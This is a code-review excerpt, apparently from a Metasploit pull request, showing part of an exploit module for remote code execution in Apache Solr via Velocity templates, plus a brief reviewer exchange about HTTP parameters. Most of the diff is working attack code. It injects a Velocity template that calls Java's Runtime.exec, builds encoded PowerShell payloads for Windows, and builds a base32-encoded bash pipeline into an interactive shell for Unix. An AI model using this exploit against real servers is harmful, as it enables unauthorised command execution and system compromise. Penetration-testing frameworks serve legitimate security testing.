modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,354 @@
+        })
+
+      # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
+      unless update_config.code == 200
+        fail_with(Failure::UnexpectedReply, 'Unable to update config, exploit failed!')
+      end
+
+      print_good("params.resource.loader.enabled is now set to true!")
+    end
+
+    # automatic targeting to prevent hiccups
+    if @target_platform.include? "Windows"
+      # if target is wrong, warn and exit before doing anything
+      unless targets[datastore['TARGET']].name.include? "Windows"
+        fail_with(Failure::NoTarget, 'Target is found to be Windows, please select the proper target!')
+      end
+
+      # exploiting for Windows relies heavily on PowerShell, so go find it first
+      # TODO: will CmdStager work if PowerShell not found?
+      psh_enum = execute_command("where%20powershell", {'core_name' => @core_name})
+      # abort the exploit if PowerShell was not found
+      unless (/powershell/i) =~ psh_enum.body.to_s
+        fail_with(Failure::NoTarget, "PowerShell not found, aborting exploit attempt!")
+      end
+
+      vprint_good("PowerShell found at #{psh_enum.body.to_s.split('0  ')[1].strip}")
+      # generate PowerShell command, encode with base64, and remove comspec
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+      # prepare to exploit...
+      execute_command(Rex::Text.uri_encode(psh_command), {'core_name' => @core_name})
+    # assume unix otherwise, and continue with default payload
+    else
+      # base32 encoded payload is the safest, without any sort of special characters except "="
+      b32_payload = Rex::Text.encode_base32(generate_payload().raw)
+      # on Unix, works best with bash, got some serious beef with plain old sh
+      bash_payload = "bash%20-c%20{echo,#{b32_payload}}|{base32,-d}|{bash,-i}"
+      # prepare to exploit...
+      execute_command(bash_payload, {'core_name' => @core_name})
+    end
+  end
+
+  # sic 'em, bois!
+  def execute_command(cmd, opts = {})
+    # custom template which enables command execution.
+    @custom_template = "%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27PAYLOAD_HERE%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
+    # substitute the payload into the template...
+    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
+    # execute the exploit...
+    send_request_cgi({
+                         'method'  => 'GET',
+                         'uri'     => "/solr/#{opts['core_name']}/select?q=1&wt=velocity&v.template=custom&v.template.custom=#{@weaponized_template}",
```

Comment:
Please use `vars_get` for HTTP GET parameters.

Reply:
Fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.